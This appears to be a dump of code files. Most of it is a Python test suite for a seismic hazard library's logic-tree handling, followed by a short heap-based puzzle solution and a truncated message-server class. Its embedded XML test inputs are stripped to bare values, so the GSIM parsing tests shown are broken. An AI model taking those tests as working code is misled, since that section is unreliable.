logictree.BranchSet('makeMeFeelGood', {})\n self.assertRaises(AssertionError,\n bs.apply_uncertainty, None, None)\n\n\nclass BranchSetApplyUncertaintyTestCase(unittest.TestCase):\n def setUp(self):\n self.point_source = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n\n def test_unknown_source_type(self):\n bs = logictree.BranchSet('maxMagGRRelative',\n {'applyToSourceType': 'forest'})\n self.assertRaises(AssertionError, bs.apply_uncertainty,\n -1, self.point_source)\n\n def test_relative_uncertainty(self):\n uncertainties = [('maxMagGRRelative', +1),\n ('bGRRelative', -0.2)]\n for uncertainty, value in uncertainties:\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, self.point_source)\n self.assertEqual(self.point_source.mfd.max_mag, 6.5 + 1)\n self.assertEqual(self.point_source.mfd.b_val, 0.9 - 0.2)\n\n def test_absolute_uncertainty(self):\n uncertainties = [('maxMagGRAbsolute', 9),\n ('abGRAbsolute', (-1, 0.2))]\n for uncertainty, value in uncertainties:\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, self.point_source)\n self.assertEqual(self.point_source.mfd.max_mag, 9)\n self.assertEqual(self.point_source.mfd.b_val, 0.2)\n self.assertEqual(self.point_source.mfd.a_val, -1)\n\n def test_absolute_incremental_mfd_uncertainty(self):\n inc_point_source = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=EvenlyDiscretizedMFD(min_mag=8.0, bin_width=0.2,\n occurrence_rates=[0.5, 0.1]),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n self.assertEqual(inc_point_source.mfd.min_mag, 8.0)\n self.assertEqual(inc_point_source.mfd.bin_width, 0.2)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[0], 0.5)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[1], 0.1)\n uncertainty, value = ('incrementalMFDAbsolute',\n (8.5, 0.1, [0.05, 0.01]))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, inc_point_source)\n self.assertEqual(inc_point_source.mfd.min_mag, 8.5)\n self.assertEqual(inc_point_source.mfd.bin_width, 0.1)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[0], 0.05)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[1], 0.01)\n\n\nclass BranchSetApplyGeometryUncertaintyTestCase(unittest.TestCase):\n def setUp(self):\n self.trace = geo.Line([geo.Point(30., 30.), geo.Point(31., 30.)])\n self.fault_source = self._make_simple_fault_source(self.trace, 0.,\n 10., 60., 
1.)\n\n def _make_simple_fault_source(self, trace, usd, lsd, dip, spacing):\n return openquake.hazardlib.source.SimpleFaultSource(\n source_id=\"SFLT0\", name=\"Simple Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n rupture_mesh_spacing=spacing,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n upper_seismogenic_depth=usd, lower_seismogenic_depth=lsd,\n fault_trace=trace, dip=dip, rake=90.0)\n\n def _make_complex_fault_source(self, edges, spacing):\n return openquake.hazardlib.source.ComplexFaultSource(\n source_id=\"CFLT0\", name=\"Complex Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n rupture_mesh_spacing=spacing,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n edges=edges, rake=90.0)\n\n def _make_planar_surface(self, planes):\n surfaces = []\n for plane in planes:\n top_left = geo.Point(plane[0, 0], plane[0, 1], plane[0, 2])\n top_right = geo.Point(plane[1, 0], plane[1, 1], plane[1, 2])\n bottom_right = geo.Point(plane[2, 0], plane[2, 1], plane[2, 2])\n bottom_left = geo.Point(plane[3, 0], plane[3, 1], plane[3, 2])\n surfaces.append(geo.PlanarSurface.from_corner_points(\n top_left, top_right, bottom_right, bottom_left))\n\n if len(surfaces) > 1:\n return geo.MultiSurface(surfaces)\n else:\n return surfaces[0]\n\n def _make_characteristic_fault_source(self, surface):\n return openquake.hazardlib.source.CharacteristicFaultSource(\n source_id=\"CHARFLT0\", name=\"Characteristic Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n temporal_occurrence_model=PoissonTOM(50.),\n surface=surface, rake=90)\n\n def test_simple_fault_dip_relative_uncertainty(self):\n self.assertAlmostEqual(self.fault_source.dip, 60.)\n new_fault_source = deepcopy(self.fault_source)\n uncertainty, value = ('simpleFaultDipRelative', -15.)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertAlmostEqual(new_fault_source.dip, 45.)\n\n def test_simple_fault_dip_absolute_uncertainty(self):\n self.assertAlmostEqual(self.fault_source.dip, 60.)\n new_fault_source = deepcopy(self.fault_source)\n uncertainty, value = ('simpleFaultDipAbsolute', 55.)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertAlmostEqual(new_fault_source.dip, 55.)\n\n def test_simple_fault_geometry_uncertainty(self):\n new_fault_source = deepcopy(self.fault_source)\n new_trace = geo.Line([geo.Point(30.5, 30.0), geo.Point(31.2, 30.)])\n new_dip = 50.\n new_lsd = 12.\n new_usd = 1.\n uncertainty, value = ('simpleFaultGeometryAbsolute',\n (new_trace, new_usd, new_lsd, new_dip, 1.0))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertEqual(new_fault_source.fault_trace, new_trace)\n self.assertAlmostEqual(new_fault_source.upper_seismogenic_depth, 1.)\n self.assertAlmostEqual(new_fault_source.lower_seismogenic_depth, 12.)\n self.assertAlmostEqual(new_fault_source.dip, 50.)\n\n def test_complex_fault_geometry_uncertainty(self):\n top_edge = geo.Line([geo.Point(30.0, 30.1, 0.0),\n 
geo.Point(31.0, 30.1, 1.0)])\n bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 9.0)])\n fault_source = self._make_complex_fault_source([top_edge, bottom_edge],\n 2.0)\n new_top_edge = geo.Line([geo.Point(30.0, 30.2, 0.0),\n geo.Point(31.0, 30.2, 0.0)])\n new_bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 10.0)])\n\n uncertainty, value = ('complexFaultGeometryAbsolute',\n ([new_top_edge, new_bottom_edge], 2.0))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n self.assertEqual(fault_source.edges[0], new_top_edge)\n self.assertEqual(fault_source.edges[1], new_bottom_edge)\n\n def test_characteristic_fault_planar_geometry_uncertainty(self):\n # Define 2-plane fault\n plane1 = numpy.array([[30.0, 30.0, 0.0],\n [30.5, 30.0, 0.0],\n [30.5, 30.0, 10.0],\n [30.0, 30.0, 10.0]])\n plane2 = numpy.array([[30.5, 30.0, 0.0],\n [30.5, 30.5, 0.0],\n [30.5, 30.5, 10.0],\n [30.5, 30.0, 10.0]])\n surface = self._make_planar_surface([plane1, plane2])\n fault_source = self._make_characteristic_fault_source(surface)\n # Move the planes\n plane3 = numpy.array([[30.1, 30.0, 0.0],\n [30.6, 30.0, 0.0],\n [30.6, 30.0, 10.0],\n [30.1, 30.0, 10.0]])\n plane4 = numpy.array([[30.6, 30.0, 0.0],\n [30.6, 30.5, 0.0],\n [30.6, 30.5, 10.0],\n [30.6, 30.0, 10.0]])\n new_surface = self._make_planar_surface([plane3, plane4])\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n # Only the longitudes are changing\n numpy.testing.assert_array_almost_equal(\n fault_source.surface.surfaces[0].corner_lons,\n numpy.array([30.1, 30.6, 30.1, 30.6]))\n numpy.testing.assert_array_almost_equal(\n fault_source.surface.surfaces[1].corner_lons,\n numpy.array([30.6, 30.6, 30.6, 30.6]))\n\n def test_characteristic_fault_simple_geometry_uncertainty(self):\n trace = geo.Line([geo.Point(30., 30.), geo.Point(31., 30.)])\n usd = 0.0\n lsd = 10.0\n dip = 45.\n # Surface\n surface = geo.SimpleFaultSurface.from_fault_data(trace, usd, lsd, dip,\n 1.0)\n surface.dip = 45.0\n fault_source = self._make_characteristic_fault_source(surface)\n # Modify dip\n new_surface = geo.SimpleFaultSurface.from_fault_data(trace, usd, lsd,\n 65., 1.0)\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n new_surface.dip = 65.0\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n self.assertAlmostEqual(fault_source.surface.get_dip(), 65.)\n\n def test_characteristic_fault_complex_geometry_uncertainty(self):\n top_edge = geo.Line([geo.Point(30.0, 30.1, 0.0),\n geo.Point(31.0, 30.1, 1.0)])\n bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 9.0)])\n surface = geo.ComplexFaultSurface.from_fault_data(\n [top_edge, bottom_edge],\n 5.)\n fault_source = self._make_characteristic_fault_source(surface)\n # New surface\n new_top_edge = geo.Line([geo.Point(30.0, 30.2, 0.0),\n geo.Point(31.0, 30.2, 0.0)])\n new_bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 10.0)])\n\n new_surface = geo.ComplexFaultSurface.from_fault_data(\n [new_top_edge, new_bottom_edge], 5.)\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n # If the surface has changed the first element in the latitude\n # array of 
the surface mesh should be 30.2\n self.assertAlmostEqual(new_surface.mesh.lats[0, 0], 30.2)\n\n\nclass BranchSetFilterTestCase(unittest.TestCase):\n def setUp(self):\n self.point = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n )\n self.area = openquake.hazardlib.source.AreaSource(\n source_id='area', name='area',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1,\n polygon=openquake.hazardlib.geo.Polygon(\n [openquake.hazardlib.geo.Point(0, 0),\n openquake.hazardlib.geo.Point(0, 1),\n openquake.hazardlib.geo.Point(1, 0)]),\n area_discretization=10, rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n )\n self.simple_fault = openquake.hazardlib.source.SimpleFaultSource(\n source_id='simple_fault', name='simple fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, rupture_mesh_spacing=2.0,\n fault_trace=openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0),\n openquake.hazardlib.geo.Point(1, 1)]),\n dip=45, rake=180,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n self.complex_fault = openquake.hazardlib.source.ComplexFaultSource(\n source_id='complex_fault', name='complex fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, rupture_mesh_spacing=2.0, rake=0,\n edges=[openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0, 1),\n openquake.hazardlib.geo.Point(1, 1, 1)]),\n openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0, 2),\n openquake.hazardlib.geo.Point(1, 1, 2)])],\n temporal_occurrence_model=PoissonTOM(50.),\n )\n\n lons = numpy.array([-1., 1., -1., 1.])\n lats = numpy.array([0., 0., 0., 0.])\n depths = numpy.array([0., 0., 10., 10.])\n\n points = [openquake.hazardlib.geo.Point(lon, lat, depth)\n for lon, lat, depth in\n zip(lons, lats, depths)]\n self.characteristic_fault = \\\n openquake.hazardlib.source.CharacteristicFaultSource(\n source_id='characteristic_fault',\n name='characteristic fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, 
bin_width=0.1),\n surface=openquake.hazardlib.geo.PlanarSurface(\n strike=0.0, dip=90.0,\n top_left=points[0], top_right=points[1],\n bottom_right=points[3], bottom_left=points[2]\n ),\n rake=0,\n temporal_occurrence_model=PoissonTOM(50.))\n\n def test_unknown_filter(self):\n bs = logictree.BranchSet(None, {'applyToSources': [1], 'foo': 'bar'})\n self.assertRaises(AssertionError, bs.filter_source, None)\n\n def test_source_type(self):\n bs = logictree.BranchSet(None, {'applyToSourceType': 'area'})\n for src in (self.simple_fault, self.complex_fault, self.point,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(src), False)\n self.assertEqual(bs.filter_source(self.area), True)\n\n bs = logictree.BranchSet(None, {'applyToSourceType': 'point'})\n for source in (self.simple_fault, self.complex_fault, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.point), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'simpleFault'}\n )\n for source in (self.complex_fault, self.point, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.simple_fault), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'complexFault'}\n )\n for source in (self.simple_fault, self.point, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.complex_fault), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'characteristicFault'}\n )\n for source in (self.simple_fault, self.point, self.area,\n self.complex_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.characteristic_fault), True)\n\n def test_tectonic_region_type(self):\n test = lambda trt, source: \\\n logictree.BranchSet(None, {'applyToTectonicRegionType': trt}) \\\n .filter_source(source)\n\n asc = 'Active Shallow Crust'\n vlc = 'Volcanic'\n ssc = 'Stable Shallow Crust'\n sif = 'Subduction Interface'\n sic = 'Subduction IntraSlab'\n\n source = self.simple_fault\n\n source.tectonic_region_type = sic\n for wrong_trt in (asc, vlc, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(sic, source), True)\n\n source.tectonic_region_type = vlc\n for wrong_trt in (asc, sic, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(vlc, source), True)\n\n source.tectonic_region_type = sif\n for wrong_trt in (asc, vlc, ssc, sic):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(sif, source), True)\n\n source.tectonic_region_type = ssc\n for wrong_trt in (asc, vlc, sic, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(ssc, source), True)\n\n source.tectonic_region_type = asc\n for wrong_trt in (sic, vlc, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(asc, source), True)\n\n def test_sources(self):\n test = lambda sources, source, expected_result: self.assertEqual(\n logictree.BranchSet(\n None, {'applyToSources': [s.source_id for s in sources]}\n ).filter_source(source),\n expected_result\n )\n\n test([self.simple_fault, self.area], self.point, False)\n test([self.simple_fault, self.area], self.area, True)\n test([self.complex_fault, self.simple_fault], self.area, False)\n test([self.area], self.area, True)\n test([self.point, self.simple_fault], self.simple_fault, True)\n 
test([self.point, self.complex_fault], self.simple_fault, False)\n\n\nclass GsimLogicTreeTestCase(unittest.TestCase):\n def parse_invalid(self, xml, errorclass, errormessage=None):\n if hasattr(xml, 'encode'):\n xml = xml.encode('utf8')\n with self.assertRaises(errorclass) as exc:\n logictree.GsimLogicTree(StringIO(xml), ['Shield'])\n if errormessage is not None:\n self.assertEqual(errormessage, str(exc.exception))\n\n def parse_valid(self, xml, tectonic_region_types=('Shield',)):\n xmlbytes = xml.encode('utf-8') if hasattr(xml, 'encode') else xml\n return logictree.GsimLogicTree(\n StringIO(xmlbytes), tectonic_region_types)\n\n def test_not_xml(self):\n self.parse_invalid('xxx', ET.ParseError)\n self.parse_invalid('\n \n \n \"\"\")\n self.parse_invalid(xml, AttributeError,\n \"No subnode named 'logicTree' found in 'nrml'\")\n\n def test_not_a_gsim_logic_tree(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n +100\n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, ValueError, 'Unknown GSIM: +100 in file ')\n\n def test_gmpe_uncertainty(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n +1\n 1.0\n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n ': only uncertainties of type \"gmpeModel\" are allowed '\n 'in gmpe logic tree')\n\n def test_two_branchsets_in_one_level(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n ': Branching level bl1 has multiple branchsets')\n\n def test_branchset_id_not_unique(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n ChiouYoungs2008\n 0.7\n \n \n SadighEtAl1997\n 0.3\n \n \n \n \n \n \n ChiouYoungs2008\n 0.6\n \n \n SadighEtAl1997\n 0.4\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n \": Duplicated branchSetID bs1\")\n\n def test_invalid_gsim(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SAdighEtAl1997\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, ValueError, \"Unknown GSIM: SAdighEtAl1997 in file \")\n\n def test_tectonic_region_type_used_twice(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 1.0\n \n \n \n \n \n \n \n ChiouYoungs2008\n \n 1.0\n \n \n \n \n \"\"\")\n self.parse_invalid(\n xml, logictree.InvalidLogicTree,\n \": Found duplicated applyToTectonicRegionType=\"\n \"['Subduction Interface', 'Subduction Interface']\")\n\n def test_SHARE(self):\n # this is actually a reduced version of the full SHARE logic tree\n xml = codecs.open(\n os.path.join(DATADIR, 'gmpe_logic_tree_share_reduced.xml'),\n encoding='utf8').read().encode('utf8')\n as_model_trts = ['Active Shallow Crust', 'Stable Shallow Crust',\n 'Shield', 'Volcanic']\n fs_bg_model_trts = ['Active Shallow Crust', 'Stable Shallow Crust']\n as_model_lt = self.parse_valid(xml, as_model_trts)\n fs_bg_model_lt = self.parse_valid(xml, fs_bg_model_trts)\n self.assertEqual(as_model_lt.get_num_branches(),\n {'bs1': 4, 'bs2': 5, 'bs3': 2, 'bs4': 1})\n self.assertEqual(fs_bg_model_lt.get_num_branches(),\n {'bs1': 4, 'bs2': 5, 'bs3': 0, 'bs4': 0})\n self.assertEqual(as_model_lt.get_num_paths(), 40)\n self.assertEqual(fs_bg_model_lt.get_num_paths(), 20)\n self.assertEqual(len(list(as_model_lt)), 5 * 4 * 2 * 1)\n effective_rlzs = set(rlz.uid for rlz in fs_bg_model_lt)\n self.assertEqual(len(effective_rlzs), 5 * 4)\n\n def test_sampling(self):\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n SadighEtAl1997\n \n 0.4\n \n \n \n ToroEtAl2002\n \n 0.6\n \n \n \n \n 
\"\"\")\n # test a large number of samples with the algorithm used in the engine\n counter = collections.Counter()\n gsim_rlzs = list(self.parse_valid(xml, ['Volcanic']))\n for seed in range(1000):\n [rlz] = logictree.sample(gsim_rlzs, 1, seed)\n counter[rlz.lt_path] += 1\n # the percentages will be close to 40% and 60%\n self.assertEqual(counter, {('b1',): 413, ('b2',): 587})\n\n def test_get_gsim_by_trt(self):\n xml = _make_nrml(\"\"\"\\\n \n\n \n \n\n \n AkkarBommer2010\n 1.0\n \n \n \n \n\n \n \n\n \n AkkarBommer2010\n 1.0\n \n \n \n \n\n \n \n\n \n ToroEtAl2002SHARE\n 1.0\n \n \n \n \n\n \n \n \n \n ZhaoEtAl2006SInter\n 1.0\n \n \n \n \n\n \n \n\n \n ZhaoEtAl2006SSlab\n 1.0\n \n \n \n \n\n \n \n \n FaccioliEtAl2010\n 1.0\n \n \n \n\n \n \n\n \n LinLee2008SSlab\n 1.0\n \n\n \n \n\n \"\"\")\n gsim_lt = self.parse_valid(xml, [\"Stable Shallow Crust\"])\n [rlz] = gsim_lt\n gsim = gsim_lt.get_gsim_by_trt(rlz, 'Stable Shallow Crust')\n self.assertEqual(str(gsim), 'AkkarBommer2010()')\n # this test was broken in release 1.4, a wrong ordering\n # of the value gave back LinLee2008SSlab instead of AkkarBommer2010\n self.assertEqual([str(v) for v in rlz.value], [\n 'AkkarBommer2010()', 'AkkarBommer2010()', 'ToroEtAl2002SHARE()',\n 'ZhaoEtAl2006SInter()', 'ZhaoEtAl2006SSlab()',\n 'FaccioliEtAl2010()', 'LinLee2008SSlab()'])\n\n def test_gsim_with_kwargs(self):\n class FakeGMPETable(object):\n def __init__(self, gmpe_table):\n self.gmpe_table = gmpe_table\n\n def __str__(self):\n return 'FakeGMPETable(gmpe_table=\"%s\")' % self.gmpe_table\n\n valid.GSIM['FakeGMPETable'] = FakeGMPETable\n try:\n xml = _make_nrml(\"\"\"\\\n \n \n \n \n \n FakeGMPETable\n \n 1.0\n \n \n \n \n \"\"\")\n gsim_lt = self.parse_valid(xml, ['Shield'])\n self.assertEqual(repr(gsim_lt), '''''')\n finally:\n del valid.GSIM['FakeGMPETable']\n\n\nclass LogicTreeProcessorTestCase(unittest.TestCase):\n def setUp(self):\n # this is an example with number_of_logic_tree_samples = 1\n oqparam = tests.get_oqparam('classical_job.ini')\n self.source_model_lt = readinput.get_source_model_lt(oqparam)\n self.gmpe_lt = readinput.get_gsim_lt(\n oqparam, ['Active Shallow Crust', 'Subduction Interface'])\n self.seed = oqparam.random_seed\n\n def test_sample_source_model(self):\n [(sm_name, weight, branch_ids, _, _)] = self.source_model_lt\n self.assertEqual(sm_name, 'example-source-model.xml')\n self.assertEqual(('b1', 'b4', 'b7'), branch_ids)\n\n def test_multi_sampling(self):\n orig_samples = self.source_model_lt.num_samples\n self.source_model_lt.num_samples = 10\n samples_dic = self.source_model_lt.samples_by_lt_path()\n try:\n self.assertEqual(samples_dic, collections.Counter(\n {('b1', 'b4', 'b7'): 6, ('b1', 'b5', 'b8'): 4}))\n finally:\n self.source_model_lt.num_samples = orig_samples\n\n def test_sample_gmpe(self):\n [(value, weight, branch_ids, _, _)] = logictree.sample(\n list(self.gmpe_lt), 1, self.seed)\n self.assertEqual(value, ('ChiouYoungs2008()', 'SadighEtAl1997()'))\n self.assertEqual(weight, 0.5)\n self.assertEqual(('b2', 'b3'), branch_ids)\n\n\nclass LogicTreeProcessorParsePathTestCase(unittest.TestCase):\n def setUp(self):\n oqparam = tests.get_oqparam('classical_job.ini')\n\n self.uncertainties_applied = []\n\n def apply_uncertainty(branchset, value, source):\n fingerprint = (branchset.uncertainty_type, value)\n self.uncertainties_applied.append(fingerprint)\n self.original_apply_uncertainty = logictree.BranchSet.apply_uncertainty\n logictree.BranchSet.apply_uncertainty = apply_uncertainty\n\n self.source_model_lt = 
readinput.get_source_model_lt(oqparam)\n self.gmpe_lt = readinput.get_gsim_lt(\n oqparam, ['Active Shallow Crust', 'Subduction Interface'])\n\n def tearDown(self):\n logictree.BranchSet.apply_uncertainty = self.original_apply_uncertainty\n\n def test_parse_source_model_logictree_path(self):\n make_apply_un = self.source_model_lt.make_apply_uncertainties\n make_apply_un(['b1', 'b5', 'b8'])(None)\n self.assertEqual(self.uncertainties_applied,\n [('maxMagGRRelative', -0.2),\n ('bGRRelative', -0.1)])\n del self.uncertainties_applied[:]\n make_apply_un(['b1', 'b3', 'b6'])(None)\n self.assertEqual(self.uncertainties_applied,\n [('maxMagGRRelative', 0.2),\n ('bGRRelative', 0.1)])\n\n def test_parse_invalid_smlt(self):\n smlt = os.path.join(DATADIR, 'source_model_logic_tree.xml')\n with self.assertRaises(Exception) as ctx:\n for smpath in source.collect_source_model_paths(smlt):\n pass\n exc = ctx.exception\n self.assertIn('not well-formed (invalid token)', str(exc))\n self.assertEqual(exc.lineno, 5)\n self.assertEqual(exc.offset, 61)\n self.assertEqual(exc.filename, smlt)\n","repo_name":"GFZ-Centre-for-Early-Warning/shakyground","sub_path":"openquake/commonlib/tests/logictree_test.py","file_name":"logictree_test.py","file_ext":"py","file_size_in_byte":112470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39817000046","text":"import sys\r\nimport heapq\r\ninput = sys.stdin.readline\r\ng = lambda: [*map(int, input().split())]\r\n\r\nN = int(input())\r\narr = g()\r\nheapq.heapify(arr)\r\nfor k in range(N - 1):\r\n for num in g():\r\n if arr[0] < num:\r\n heapq.heappop(arr)\r\n heapq.heappush(arr, num)\r\nprint(arr[0])","repo_name":"juwkim/boj","sub_path":"백준/Silver/2075. N번째 큰 수/N번째 큰 수.py","file_name":"N번째 큰 수.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73294516725","text":"from enum import Enum\nfrom src.Engine.helpers.NewThreadExecutionAanotation import executeInNewThread\n\n\nclass MsgTypes(Enum):\n NEW_RECORDING = 1,\n UPDATE_PCM_CHART = 2,\n NEW_CURRENT_CHUNK = 3,\n RECORDING_STOP = 4,\n RECORDING_PAUSE = 5,\n UPDATE_FREQ_SPECTR_CHART = 6,\n UPDATE_FREQS_CHART = 7,\n NEW_HZ = 8\n\n\nclass MessageServer:\n _observers: list = []\n _observersByEvents: dict = {\n MsgTypes.NEW_RECORDING: [],\n MsgTypes.UPDATE_PCM_CHART: [],\n MsgTypes.NEW_CURRENT_CHUNK: [],\n MsgTypes.RECORDING_STOP: [],\n MsgTypes.RECORDING_PAUSE: [],\n MsgTypes.UPDATE_FREQ_SPECTR_CHART: [],\n MsgTypes.UPDATE_FREQS_CHART: [],\n MsgTypes.NEW_HZ: []\n }\n \n @classmethod\n def register(self, obj):\n self._observers.append(obj)\n \n @classmethod\n def registerForEvent(cls, obj, eventType: MsgTypes):\n cls._observersByEvents.get(eventType).append(obj)\n \n @classmethod\n def unRegister(self, obj):\n self._observers.remove(obj)\n \n @classmethod\n def notifyClients(self, msgType: MsgTypes, data=None):\n for i in self._observers:\n i.handleMessage(msgType=msgType, data=data)\n \n @classmethod\n def notifyEventClients(self, msgType: MsgTypes, data=None):\n for i in 